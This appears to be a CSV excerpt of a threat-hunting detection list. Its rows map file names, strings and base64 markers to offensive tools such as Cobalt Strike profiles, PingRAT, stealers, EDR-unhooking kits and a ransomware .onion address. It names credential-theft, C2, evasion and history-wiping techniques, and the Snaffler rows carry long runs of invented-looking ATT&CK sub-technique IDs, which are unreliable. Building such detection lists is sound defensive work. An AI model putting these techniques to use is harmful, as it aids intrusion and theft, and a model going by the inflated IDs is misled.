"*UltraSnaffCore.csproj*",".{0,1000}UltraSnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - 
T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61820" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - 
T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61821" "*UltraSnaffler.sln*",".{0,1000}UltraSnaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","61822" "*UmaRex01/HookSentry*",".{0,1000}UmaRex01\/HookSentry.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for 
functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","61835" "*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*",".{0,1000}UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT\-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society 
- Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","61836" "*umutcamliyurt/PingRAT*",".{0,1000}umutcamliyurt\/PingRAT.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","61838" "*UmVkIFRlYW1pbmcgYW5kIE9mZmVuc2l2ZSBTZWN1cml0eSAg*",".{0,1000}UmVkIFRlYW1pbmcgYW5kIE9mZmVuc2l2ZSBTZWN1cml0eSAg.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","61839" "*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*",".{0,1000}UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61840" "*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61841" "*UmVmbGVjdGl2ZSBETEwgUGF0aA==*",".{0,1000}UmVmbGVjdGl2ZSBETEwgUGF0aA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61842" "*UmVmbGVjdGl2ZSBETEwgVVJJ*",".{0,1000}UmVmbGVjdGl2ZSBETEwgVVJJ.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61843" "*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*",".{0,1000}UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61844" "*UmVtb3ZlLUl0ZW0gKEdldC1QU3JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGggLUZvcmNlIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVl*",".{0,1000}UmVtb3ZlLUl0ZW0gKEdldC1QU3JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGggLUZvcmNlIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVl.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","61845" "*Un1k0d3r/SCShell*",".{0,1000}Un1k0d3r\/SCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","61846" "*Unable to inject 64-bit shellcode from within 32-bit Powershell*",".{0,1000}Unable\sto\sinject\s64\-bit\sshellcode\sfrom\swithin\s32\-bit\sPowershell.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","61847" "*uname=FUZZ&pass=FUZZ*",".{0,1000}uname\=FUZZ\&pass\=FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","61849" "*Unblock-File .\install.ps1*",".{0,1000}Unblock\-File\s\.\\install\.ps1.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","61850" "*Unconstrained_Delegation_Systems.txt*",".{0,1000}Unconstrained_Delegation_Systems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61851" "*unDefender-master*",".{0,1000}unDefender\-master.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","61852" "*undertheradar-main*",".{0,1000}undertheradar\-main.{0,1000}","offensive_tool_keyword","undertheradar","scripts 
that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","61853" "*undgrddapc4reaunnrdrmnagvdelqfvmgycuvilgwb5uxm25sxawaoqd.onion*",".{0,1000}undgrddapc4reaunnrdrmnagvdelqfvmgycuvilgwb5uxm25sxawaoqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61854" "*Unhandled Rubeus exception:*",".{0,1000}Unhandled\sRubeus\sexception\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61855" "*unhide-implant*",".{0,1000}unhide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61856" "*unhook kernel32*",".{0,1000}unhook\skernel32.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61857" "*unhook wldp amsi*",".{0,1000}unhook\swldp\samsi.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","61858" "*unhook_ntdll(remote_process*",".{0,1000}unhook_ntdll\(remote_process.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","61859" "*UnhookingKnownDlls.*",".{0,1000}UnhookingKnownDlls\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","61860" "*UnhookingNtdll_disk.*",".{0,1000}UnhookingNtdll_disk\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","61861" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61862" "*UnhookingPatch-main*",".{0,1000}UnhookingPatch\-main.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61863" "*UniByAv*",".{0,1000}UniByAv.{0,1000}","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that takes raw shellcode and generates executables that are Anti-Virus friendly. The obfuscation routine is written purely in assembly to remain pretty short and efficient. 
